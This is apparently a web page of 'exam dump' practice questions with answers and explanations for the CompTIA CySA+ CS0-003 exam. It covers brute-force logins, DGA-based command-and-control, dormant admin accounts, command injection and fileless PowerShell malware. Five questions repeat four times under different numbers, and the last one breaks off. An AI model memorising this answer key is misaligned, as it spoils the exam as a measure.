CompTIA  CS0-003  CySA+  Exam Dumps and Practice Test Questions Set 8 Q141-160

Visit here for our full CompTIA CS0-003 exam dumps and practice test questions.

Question 141

 A SOC analyst notices multiple failed login attempts targeting several administrative accounts from external IP addresses. The attempts are rapid and use variations of common usernames. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The described scenario indicates a classic brute-force attack targeting user credentials. Brute-force attacks involve systematically attempting combinations of usernames and passwords until a valid set is discovered. The high frequency of login failures across multiple administrative accounts, especially using variations of usernames, is indicative of automated tools attempting to gain unauthorized access.

Attackers often leverage botnets to distribute login attempts across multiple IP addresses, evading traditional IP-based blocking. These attacks are automated, enabling thousands of attempts in minutes, which allows threat actors to potentially compromise accounts with weak or reused passwords. Monitoring for patterns such as repeated failed logins, geographical anomalies, and unusual login times is crucial for detection.

Mitigation involves implementing account lockout policies that temporarily disable accounts after a threshold of failed attempts. Multi-factor authentication (MFA) is highly effective in preventing unauthorized access even if passwords are compromised, requiring an additional authentication factor. Rate limiting and anomaly detection on authentication endpoints help identify brute-force campaigns in progress.

Log aggregation and correlation through SIEM solutions allow analysts to detect distributed patterns of attacks that might otherwise go unnoticed on individual systems. Organizations should also enforce strong password policies, regular password rotation, and user training on credential hygiene. Threat intelligence can provide information on IP addresses known for brute-force campaigns, enabling proactive blocking and monitoring.

B Fileless malware using living-off-the-land techniques

Fileless malware operates primarily in memory, often leveraging legitimate system tools. It does not produce repeated failed login attempts and is distinct from credential brute-forcing.

C Distributed denial-of-service (DDoS) attack

 DDoS attacks aim to overwhelm system resources to disrupt service availability. They do not involve repeated credential testing or systematic login attempts across accounts.

D Phishing emails delivering malicious attachments

Phishing campaigns may deliver malware or steal credentials but rely on user interaction rather than automated login attempts across multiple endpoints.

Question 142

An analyst identifies a surge in DNS queries to pseudo-randomly generated domains combined with outbound traffic to unknown IP addresses over non-standard ports. Which of the following BEST describes the threat?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of high-volume DNS queries to pseudo-random domains and outbound traffic to unknown IP addresses over uncommon ports strongly indicates malware utilizing a domain generation algorithm (DGA) for command-and-control (C2) operations. DGAs allow malware to maintain resilient communication with C2 infrastructure while evading traditional defenses like blacklists or signature-based detection.

DGAs generate a set of domain names algorithmically, enabling malware to connect to C2 servers even if some domains are blocked or taken down. This technique ensures persistence and stealth, allowing attackers to issue commands, exfiltrate data, and maintain long-term control over compromised systems. High-entropy domain names and unusual connection patterns are key indicators of DGA activity.

Detection requires correlating DNS logs with network traffic. Analysts look for repeated queries to high-entropy or randomized domains and connections over uncommon ports. Behavioral monitoring, endpoint detection and response (EDR), and machine learning-based anomaly detection improve the identification of DGA-based malware. Reverse-engineering DGAs enables prediction and preemptive blocking of future domains.

Mitigation involves isolating affected endpoints, blocking known malicious domains, removing malware, and conducting forensic investigations. Threat intelligence integration provides knowledge of known DGA malware families, associated indicators of compromise (IOCs), and relevant attack techniques. Defense-in-depth strategies, including network segmentation, strict egress filtering, application whitelisting, and user training, enhance protection against DGA-enabled malware.

B Routine software update traffic

 Software updates communicate with known servers over standard ports and predictable domains. Randomized domains and high-volume queries are inconsistent with normal updates.

C Distributed denial-of-service (DDoS) attack

 DDoS attacks overwhelm systems to disrupt availability but do not establish covert communication with pseudo-random domains or C2 servers.

D Misconfigured internal monitoring system

While misconfigurations can generate abnormal traffic, they rarely produce high-frequency queries to pseudo-random domains combined with outbound connections over unusual ports.

Question 143

A security audit reveals multiple privileged accounts that have not been used in over six months. Which control would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

 Dormant privileged accounts represent a significant attack vector. Attackers may exploit inactive accounts to gain unauthorized access, maintain persistence, or perform lateral movement within the network. Automated account deprovisioning systematically disables or removes accounts after a defined inactivity period, enforcing least privilege and reducing the attack surface.

Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and regulatory compliance (e.g., PCI DSS, HIPAA, SOX). Manual deprovisioning is prone to human error and may overlook dormant accounts, leaving potential vulnerabilities. Automated processes ensure timely removal and consistency across all systems.

Complementary measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Monitoring attempts to access disabled accounts provides early detection of potential insider threats or compromised credentials.

B Increase password complexity for service accounts

Strong passwords reduce brute-force attack risks but do not address dormant accounts retaining administrative privileges.

C Disable all external SSH access

SSH restrictions reduce certain attack vectors but do not mitigate risks associated with inactive accounts.

D Deploy full disk encryption on endpoints

Encryption protects data at rest but does not mitigate threats related to dormant administrative accounts.

Question 144

During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection vulnerabilities occur when applications fail to validate input, allowing attackers to execute arbitrary OS commands. Server-side validation ensures all input meets expected patterns, types, and lengths, while parameterized commands separate user input from executable code.

Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, are essential to mitigate injection attacks. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities before deployment. Web application firewalls (WAFs) provide an additional layer of protection by blocking malicious requests.

Monitoring anomalous input behavior and logging input validation failures support early detection. Remediation includes code updates, secure coding training, and regular penetration tests. TLS encrypts communications but does not prevent injection. Session timeouts mitigate session hijacking but not injection. Firewalls cannot inspect application input, making input validation the primary control.

B Enforce TLS encryption for all web traffic

TLS secures communication but does not address input validation vulnerabilities.

C Increase session timeout value

 Session timeouts mitigate hijacking but do not prevent command injection.

D Add additional firewall rules at the perimeter

 Firewalls control network traffic but cannot mitigate application-layer input vulnerabilities effectively.

Question 145

A SOC analyst detects obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate tools like PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating externally without leaving artifacts on disk indicate living-off-the-land (LotL) techniques. These attacks bypass traditional signature-based antivirus detection by operating in volatile memory.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include abnormal script execution, outbound traffic to unknown IPs, and deviations from normal behavior. Effective mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts, and performing remediation.

Preventive measures include enforcing least privilege, PowerShell logging, script block logging, execution policies, application whitelisting, and integrating threat intelligence to block malicious domains. A defense-in-depth approach combining monitoring, anomaly detection, user training, and structured incident response is essential.

Fileless malware differs from ransomware, phishing, and DDoS attacks in that it operates without creating traditional files, leveraging legitimate tools and memory-resident code to evade detection.

Question 146

A SOC analyst observes repeated login failures targeting multiple accounts from several external IP addresses. The usernames follow predictable patterns, and attempts occur at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The scenario described is indicative of a brute-force attack, where an adversary attempts to systematically guess passwords to gain unauthorized access to accounts. The high frequency of login failures across multiple accounts, combined with predictable username patterns, points to automated credential attacks rather than human error or benign system behavior.

Brute-force attacks can be carried out manually, but attackers often leverage automated tools and botnets to increase the speed and scale of their attacks. These attacks are typically distributed across multiple IP addresses to avoid detection and circumvent IP-based blocking mechanisms. Attackers may target weak or reused passwords, as well as default administrative credentials that are often overlooked by system administrators.

Detection and mitigation require a multi-layered approach. Account lockout policies can prevent repeated login attempts by temporarily disabling accounts after a threshold number of failures. Multi-factor authentication (MFA) provides an additional layer of protection, requiring a second authentication factor, such as a one-time passcode or biometric verification, which significantly reduces the risk of compromise even if passwords are discovered.

Monitoring and correlating authentication logs through SIEM solutions allows analysts to detect patterns of brute-force attacks. Advanced analytics, including machine learning models, can identify unusual login behaviors and generate alerts. Rate-limiting login attempts at the application or network level slows attack progress and gives security teams time to respond.

User education on password hygiene, regular password rotation policies, and enforcing strong password requirements are critical preventive measures. Threat intelligence feeds can help identify known attacker IP addresses and credential attack campaigns, enabling proactive blocking and enhanced monitoring.

B Fileless malware using living-off-the-land techniques

Fileless malware operates primarily in memory and leverages legitimate system tools like PowerShell or WMI. While it can perform malicious actions, it does not manifest as repeated login failures targeting multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm system resources to disrupt service availability. They do not involve systematic testing of credentials or repeated failed login attempts

D Phishing emails delivering malicious attachments
Phishing attacks require user interaction to deliver malicious payloads or steal credentials. Automated login attempts across multiple accounts are inconsistent with typical phishing activity.

Effective response includes isolating potentially affected accounts, resetting compromised passwords, monitoring authentication logs, enforcing MFA, and blocking suspicious IP addresses. Continuous monitoring, threat intelligence integration, and layered defense strategies reduce the risk of successful credential compromise.

Question 147

An analyst observes unusual outbound network traffic from a host to multiple external IP addresses over non-standard ports. DNS logs indicate high-frequency queries to randomized domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of outbound connections over non-standard ports and high-frequency DNS queries to randomized domains is characteristic of malware employing a domain generation algorithm (DGA) to maintain resilient communication with command-and-control (C2) servers. DGAs dynamically generate a set of pseudo-random domain names at specific intervals, enabling malware to evade detection mechanisms, such as static blacklists or traditional signature-based defenses.

DGAs are commonly associated with sophisticated malware families, including advanced persistent threat (APT) actors, as they enable persistent and stealthy communication. By generating new domains periodically, malware can circumvent domain takedowns and maintain command and control even in dynamic network environments. Detection relies on analyzing DNS and network traffic for unusual query volumes, high-entropy domain names, repeated failed resolutions, and outbound connections to uncommon ports.

Mitigation involves isolating affected endpoints, blocking malicious domains and IPs, and performing malware eradication procedures. Reverse-engineering the DGA can predict future domain names for preemptive blocking. Integration with threat intelligence feeds helps identify malware families, algorithms, and indicators of compromise (IOCs).

Behavioral monitoring and endpoint detection and response (EDR) systems improve visibility into memory-resident malware or fileless threats. Defense-in-depth strategies, including network segmentation, strict egress filtering, application whitelisting, and user education, enhance protection against DGA-based malware.

B Routine software update traffic

Legitimate software updates communicate with known servers using standard ports and predictable domains. Randomized domain queries and connections over unusual ports are inconsistent with update traffic.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources and disrupt availability, not maintain covert communication with external domains.

D Misconfigured internal monitoring system

While misconfigurations may generate abnormal traffic, they rarely produce pseudo-random DNS queries and outbound connections to non-standard ports.

 

Question 148

 A security audit identifies privileged accounts that have not been used for over six months but retain administrative privileges. Which control would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Inactive privileged accounts are high-risk targets for attackers seeking unauthorized access. Automated account deprovisioning systematically disables or removes accounts after a predefined period of inactivity, reducing the attack surface. This aligns with the principle of least privilege by ensuring administrative access is granted only when necessary.

Integration with identity governance and privileged access management (PAM) systems ensures consistent enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to oversight and human error, whereas automation ensures dormant accounts are consistently addressed.

Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), privilege recertification, and continuous monitoring of account activity. Monitoring attempts to access deprovisioned accounts can detect insider threats or attempted credential misuse. Automated deprovisioning improves operational efficiency and reduces the likelihood of dormant accounts being exploited by malicious actors.

B Increase password complexity requirements for service accounts

While complex passwords reduce brute-force risks, they do not address the inherent risk posed by dormant privileged accounts.

C Disable all external SSH access

Restricting SSH access mitigates external threats but does not address risks from unused accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not prevent misuse of privileged accounts.

Question 149

During a penetration test, testers exploit unsanitized web application input fields that allow OS-level command execution. Which control BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when applications fail to properly validate user input, allowing malicious commands to be executed at the OS level. Server-side input validation ensures that all input is checked against expected patterns, types, and lengths, preventing execution of arbitrary commands. Parameterized commands or prepared statements further isolate user input from executable code, effectively neutralizing injection attacks.

Secure coding practices, including input validation, output encoding, and adherence to secure frameworks, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify issues during development. Web application firewalls (WAFs) provide an additional layer by blocking known attack signatures.

Monitoring anomalous input attempts and logging validation failures enhances detection. Remediation includes code updates, developer training, and penetration testing. TLS encryption secures communication but does not prevent injection. Session timeouts protect sessions but not input validation. Firewall rules cannot inspect application input effectively, making server-side validation with parameterized commands the primary control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not mitigate command injection vulnerabilities.

C Increase session timeout value

 Session timeouts address session hijacking but do not prevent command injection.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent attacks targeting application input vulnerabilities.

 

Question 150

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints that communicate with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory and utilizes legitimate system tools, such as PowerShell, WMI, or macros, to execute malicious actions. Obfuscated scripts communicating externally without creating files on disk are indicative of living-off-the-land (LotL) malware, which evades traditional signature-based antivirus.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include unusual script execution, outbound connections to unknown IPs, and deviations from baseline behavior. Mitigation involves isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.

Preventive measures include enforcing least privilege, application whitelisting, PowerShell script logging, script block logging, execution policy enforcement, and integrating threat intelligence to block malicious domains. A defense-in-depth strategy combining monitoring, anomaly detection, user training, and structured incident response is essential for addressing fileless malware threats.

Fileless malware differs from ransomware, phishing, and DDoS attacks because it operates without traditional files, leveraging memory-resident execution and legitimate tools for persistence and evasion.

Question 151

A SOC analyst identifies a large number of failed login attempts across multiple administrative accounts originating from external IP addresses. The usernames follow predictable patterns, and the login attempts are occurring at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials
The described scenario is indicative of a brute-force attack targeting user credentials. Brute-force attacks involve systematically trying large numbers of possible username and password combinations to gain unauthorized access to accounts. The rapid frequency of login failures, particularly targeting administrative accounts, along with predictable username patterns, suggests automated tools or scripts are being used rather than human error.

Attackers often leverage distributed botnets to perform brute-force attacks from multiple IP addresses, making it difficult to block using simple IP-based rules. These attacks aim to compromise weak or reused passwords, exploiting accounts that lack multi-factor authentication (MFA). Brute-force attacks can lead to privilege escalation, data theft, and the potential deployment of malware across compromised systems.

Detection and mitigation require a multi-layered approach. Account lockout policies temporarily disable accounts after a threshold number of failed login attempts, reducing the efficacy of automated brute-force tools. Implementing MFA ensures that even if passwords are compromised, an additional authentication factor, such as a time-based one-time password or biometric factor, is required, mitigating unauthorized access risk.

Monitoring failed login attempts across the environment using SIEM solutions or centralized logging allows analysts to identify patterns indicative of brute-force attacks. Machine learning-based anomaly detection can highlight unusual login patterns, such as multiple failures from disparate geolocations. Rate limiting on authentication endpoints slows the attack process, providing additional time for security response.

Complementary measures include enforcing strong password policies, regular password rotation, and user education on credential hygiene. Threat intelligence feeds can help identify known attacker IPs and campaigns, enabling proactive defense and blocking measures.

B Fileless malware using living-off-the-land techniques

Fileless malware primarily resides in memory, leveraging legitimate system tools for execution. While it can perform malicious actions, it does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm system resources to disrupt service availability. They do not involve systematic credential testing or repeated failed login attempts targeting accounts.

D Phishing emails delivering malicious attachments

Phishing campaigns deliver malware or attempt to steal credentials through user interaction. Automated login attempts across multiple accounts do not match typical phishing patterns.

Effective response includes isolating potentially compromised accounts, enforcing MFA, monitoring authentication logs, blocking suspicious IPs, and performing forensic investigations to ensure no accounts have been compromised. Continuous monitoring and layered security measures are essential to reduce the likelihood of successful credential compromise.

Question 152

An analyst detects unusual outbound network traffic from a host to multiple unknown external IP addresses over high-numbered ports. DNS logs reveal frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The combination of high-volume DNS queries to pseudo-random domains and outbound connections to unknown IPs over non-standard ports is characteristic of malware employing a domain generation algorithm (DGA). DGAs are used to dynamically generate domain names for command-and-control (C2) communications, enabling malware to evade detection and maintain persistent communication channels.

DGAs are particularly effective against security mechanisms that rely on static blacklists, as the malware can generate new domains that have not been blocked or detected. High-entropy domain names, unusual query volumes, repeated failed resolutions, and outbound connections over uncommon ports are key indicators of DGA activity. Advanced persistent threat (APT) actors frequently leverage DGAs to maintain stealthy and resilient control of compromised systems.

Detection involves correlating DNS logs with network telemetry. Behavioral analysis, endpoint detection and response (EDR), and machine learning-based anomaly detection can identify high-entropy domain queries and unusual network traffic patterns. Reverse-engineering the DGA algorithm allows prediction of future domains and preemptive blocking.

Mitigation strategies include isolating affected endpoints, blocking malicious domains and IP addresses, conducting forensic investigations, and removing malware. Integration with threat intelligence feeds enables identification of known DGA malware families, associated IOCs, and attack techniques. Defense-in-depth strategies, such as network segmentation, strict egress filtering, application whitelisting, and user awareness training, improve resilience against DGA-enabled malware.

B Routine software update traffic

Software updates communicate with predictable, known servers and standard ports. Randomized domains and high-frequency queries are inconsistent with legitimate update activity.

C Distributed denial-of-service (DDoS) attack

 DDoS attacks overwhelm target systems to degrade service availability. They do not establish covert communication channels using pseudo-random domains.

D Misconfigured internal monitoring system

While misconfigurations can generate abnormal traffic, they rarely result in high-frequency queries to pseudo-random domains coupled with outbound connections over unusual ports.

Question 153

A security audit identifies multiple privileged service accounts that have not been used for more than six months yet retain administrative privileges. Which of the following controls would MOST effectively mitigate this risk?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts represent a significant security risk. Attackers may exploit these accounts for unauthorized access, persistence, or lateral movement. Automated account deprovisioning systematically disables or removes accounts after a defined period of inactivity, reducing the attack surface and enforcing least privilege principles.

Integration with identity governance and privileged access management (PAM) systems ensures consistent enforcement of policies, auditing capabilities, and regulatory compliance, including PCI DSS, HIPAA, and SOX. Manual account deprovisioning is prone to oversight, leading to potential security gaps, whereas automation ensures timely and consistent removal of dormant accounts.

Additional complementary measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Monitoring attempts to access disabled accounts allows early detection of potential insider threats or unauthorized access attempts. Automated deprovisioning enhances operational efficiency while significantly reducing risk.

B Increase password complexity requirements for service accounts

While complex passwords reduce the likelihood of brute-force attacks, they do not mitigate the inherent risks posed by dormant accounts retaining administrative privileges.

C Disable all external SSH access

Restricting external SSH access can reduce exposure from remote attacks but does not address risks associated with unused accounts.

D Deploy full disk encryption on endpoint

 Encryption protects data at rest but does not mitigate threats related to dormant administrative accounts.

Question 154

During a penetration test, testers exploit unsanitized web application input fields, allowing operating system-level command execution. Which of the following controls BEST mitigates this vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

 Command injection occurs when applications fail to validate user input, allowing execution of arbitrary OS-level commands. Server-side input validation ensures input conforms to expected types, patterns, and lengths. Parameterized commands or prepared statements separate user input from executable instructions, preventing injection attacks.

Secure coding practices, including input validation, output encoding, and secure framework adherence, mitigate injection vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify issues during development. Web application firewalls (WAFs) add an additional layer of protection by blocking requests matching known attack patterns.

Monitoring anomalous input attempts and logging validation failures enable early detection of potential attacks. Remediation includes updating code, conducting secure coding training for developers, and performing periodic penetration testing. TLS encryption secures communication but does not prevent command injection. Session timeouts mitigate session hijacking but not input validation vulnerabilities. Firewalls cannot effectively inspect application-level input, making server-side input validation with parameterized commands the primary mitigation control.

B Enforce TLS encryption for all web traffic

TLS ensures confidentiality and integrity of data in transit but does not prevent command injection attacks.

C Increase session timeout values

 Session timeouts reduce the risk of session hijacking but do not address input validation or command injection vulnerabilities.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent application-layer attacks targeting input validation vulnerabilities.

 

Question 155

 A SOC analyst observes obfuscated PowerShell scripts executing on endpoints that communicate with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack

Answer A

Explanation:

A Fileless malware leveraging living-off-the-land techniques

Fileless malware operates primarily in memory, using legitimate system tools such as PowerShell, WMI, or macros to execute malicious actions. Obfuscated scripts communicating with external IPs without creating files on disk are indicative of living-off-the-land (LotL) malware. This technique evades traditional signature-based antivirus detection by operating entirely in volatile memory.

Detection requires behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators of fileless malware include anomalous script execution, outbound connections to unknown IPs, and deviations from normal system behavior. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts, and performing system remediation.

Preventive measures include enforcing least privilege, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration with threat intelligence to block malicious domains. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical for identifying and mitigating fileless malware threats.

Unlike ransomware, phishing, or DDoS attacks, fileless malware operates without creating traditional files, leverages memory-resident execution, and uses legitimate system tools to persist, evade detection, and maintain control over affected systems.

Question 156

A SOC analyst observes an abnormal spike in failed login attempts targeting multiple administrative accounts from various external IP addresses. The usernames follow predictable patterns, and attempts occur at a high frequency. Which of the following BEST describes the threat?

A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments

Answer A

Explanation:

A Brute-force attack targeting user credentials

The scenario described is characteristic of a brute-force attack, which is an attack methodology where an adversary attempts numerous combinations of usernames and passwords to gain unauthorized access to systems or accounts. The repeated failed login attempts across multiple accounts, especially administrative accounts, combined with predictable username patterns, strongly suggest automated tools are being used rather than isolated human error.

Brute-force attacks can exploit weak passwords, default credentials, and commonly reused passwords. Attackers often use distributed botnets to execute login attempts from multiple IP addresses to evade IP-based detection or blocking mechanisms. This technique allows them to attempt thousands of login combinations in a short period, maximizing the likelihood of compromising an account.

Mitigation involves multiple layers of defense. Account lockout policies temporarily disable accounts after a certain number of failed attempts, reducing the effectiveness of automated tools. Multi-factor authentication (MFA) provides an additional security layer by requiring a secondary factor such as a one-time password or biometric verification, even if credentials are compromised.

Monitoring and correlation of authentication logs via SIEM solutions allows analysts to detect patterns indicative of brute-force attacks. Advanced analytics, including anomaly detection and machine learning, can detect unusual login attempts from atypical geolocations or at abnormal times. Rate limiting on authentication endpoints slows the attack, providing additional time for detection and mitigation.

User education, strong password policies, and regular password rotation further reduce the risk of successful brute-force attacks. Threat intelligence feeds can provide insight into known attack IP addresses or campaigns, enabling proactive defense and preemptive blocking measures.

B Fileless malware using living-off-the-land techniques

 Fileless malware operates in memory and leverages legitimate tools like PowerShell or WMI for malicious purposes. It does not manifest as repeated failed login attempts across multiple accounts.

C Distributed denial-of-service (DDoS) attack

DDoS attacks focus on overwhelming system resources to disrupt availability, rather than systematically attempting credential compromise.

D Phishing emails delivering malicious attachments

Phishing relies on user interaction to deliver malicious payloads or steal credentials, whereas brute-force attacks are automated attempts targeting multiple accounts.

Effective response involves isolating potentially compromised accounts, enforcing MFA, monitoring authentication logs, blocking suspicious IP addresses, and performing forensic analysis to determine if any credentials were compromised. Continuous monitoring and layered security measures are essential to reducing the risk of successful credential compromise.

 

Question 157

An analyst detects high volumes of outbound traffic from a host to unknown external IP addresses over non-standard ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?

A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system

Answer A

Explanation:

A Malware using a domain generation algorithm (DGA) for command-and-control

The observed behavior—outbound connections over non-standard ports paired with high-frequency DNS queries to pseudo-randomly generated domains—is typical of malware using a domain generation algorithm (DGA) to maintain command-and-control (C2) communications. DGAs allow malware to dynamically generate domain names, providing resilience against static detection mechanisms like blacklists or signature-based defenses.

DGAs are often used by sophisticated malware and advanced persistent threat (APT) actors. They allow malware to maintain stealthy communication even when some domains are blocked or taken down. High-entropy DNS queries, repeated failed resolutions, and connections over unusual ports are key indicators of DGA activity. Detection requires correlation of DNS logs, network traffic analysis, and endpoint telemetry. Machine learning models can detect anomalies such as unusual query volumes and high-entropy domain names.

Mitigation involves isolating affected endpoints to prevent further compromise, blocking malicious domains and IP addresses, and removing malware. Reverse-engineering the DGA allows prediction of future domains, enabling proactive blocking. Integration of threat intelligence provides insight into known malware families, their C2 infrastructure, and associated indicators of compromise (IOCs). Defense-in-depth strategies such as network segmentation, egress filtering, application whitelisting, and user training further strengthen protection against DGA-enabled malware.

B Routine software update traffic

Software updates connect to known servers on standard ports. Randomized domains and unusual outbound ports are inconsistent with legitimate update behavior.

C Distributed denial-of-service (DDoS) attack

DDoS attacks aim to overwhelm resources to disrupt availability, rather than establishing covert communication with C2 servers.

D Misconfigured internal monitoring system

While misconfigurations can generate abnormal traffic, they rarely result in high-frequency queries to pseudo-random domains and outbound connections to unknown IPs.

Question 158

A security audit identifies several privileged service accounts that have not been used in over six months but retain administrative privileges. Which control would MOST effectively reduce associated risks?

A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints

Answer A

Explanation:

A Implement automated account deprovisioning

Dormant privileged accounts pose significant security risks, as attackers may exploit them for unauthorized access, persistence, or lateral movement. Automated account deprovisioning systematically disables or removes accounts after a predefined inactivity period, reducing the attack surface and enforcing the principle of least privilege.

Integration with identity governance and privileged access management (PAM) systems ensures consistent enforcement, auditing, and regulatory compliance, including PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to oversight, potentially leaving dormant accounts vulnerable, whereas automation ensures timely and uniform removal of inactive accounts.

Additional measures include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Attempts to access deprovisioned accounts provide early detection of insider threats or unauthorized access attempts. Automated deprovisioning improves operational efficiency while significantly reducing security risks associated with dormant accounts.

B Increase password complexity requirements for service accounts

While complex passwords reduce the risk of brute-force attacks, they do not mitigate risks from dormant accounts retaining administrative privileges.

C Disable all external SSH access

 Restricting external SSH reduces exposure from remote attacks but does not address risks associated with inactive accounts.

D Deploy full disk encryption on endpoints

Full disk encryption protects data at rest but does not mitigate threats related to dormant administrative accounts.

Question 159
During a penetration test, testers exploit unsanitized web input fields, allowing OS-level command execution. Which control BEST mitigates this type of vulnerability?

A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter

Answer A

Explanation:

A Server-side input validation with parameterized commands

Command injection occurs when an application fails to validate user input, allowing execution of arbitrary OS commands. Server-side input validation ensures input conforms to expected types, patterns, and lengths. Parameterized commands or prepared statements isolate user input from executable code, preventing command injection attacks.

Secure coding practices—including input validation, output encoding, and framework-based protections—reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) help identify vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer by blocking requests that match known attack patterns.

Monitoring anomalous input attempts and logging validation failures enable early detection. Remediation includes updating application code, conducting secure coding training for developers, and periodic penetration testing. TLS encryption secures data in transit but does not prevent injection. Session timeouts mitigate session hijacking but not command injection. Firewall rules cannot inspect application-level input effectively, making server-side validation with parameterized commands the most effective mitigation.

B Enforce TLS encryption for all web traffic

 TLS ensures confidentiality and integrity of data in transit but does not prevent command injection vulnerabilities.

C Increase session timeout values

 Session timeouts reduce the risk of session hijacking but do not mitigate command injection.

D Add additional firewall rules at the perimeter

Firewalls provide network-level filtering but cannot prevent application-layer input vulnerabilities.

Question 160

A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IPs. Antivirus scans detect no malicious files. Which threat BEST describes this activity?

A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
